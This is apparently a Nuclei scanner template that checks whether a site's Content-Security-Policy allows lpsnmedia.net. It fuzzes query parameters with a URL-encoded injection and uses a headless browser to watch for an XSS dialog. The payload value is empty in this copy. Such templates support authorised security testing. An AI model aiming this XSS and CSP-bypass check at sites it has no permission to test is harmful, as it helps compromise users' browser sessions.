id: lpsnmedia-accdn-csp-bypass info: name: Content-Security-Policy Bypass - LPSN Media author: renniepak,DhiyaneshDK severity: medium reference: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,lpsnmedia-accdn flow: http(1) && headless(1) http: - method: GET path: - "{{BaseURL}}" matchers: - type: word part: header words: - "Content-Security-Policy" - "lpsnmedia.net" condition: and internal: true headless: - steps: - action: navigate args: url: "{{BaseURL}}" - action: waitdialog name: lpsnmedia_accdn_csp_xss args: max-duration: 5s payloads: injection: - '' fuzzing: - part: query type: replace mode: single fuzz: - "{{url_encode(injection)}}" matchers: - type: dsl dsl: - "lpsnmedia_accdn_csp_xss == true" # digest: 4a0a00473045022077fd767ac2e2e8f091f69382356eabed1c4bdaa05c95255e27111a5fabb6f7fd022100c63309c8e24035ddc60352ec9b4290847f82251fde8b54ba046dfb89f18f1841:922c64590222798bb761d5b6d8e72950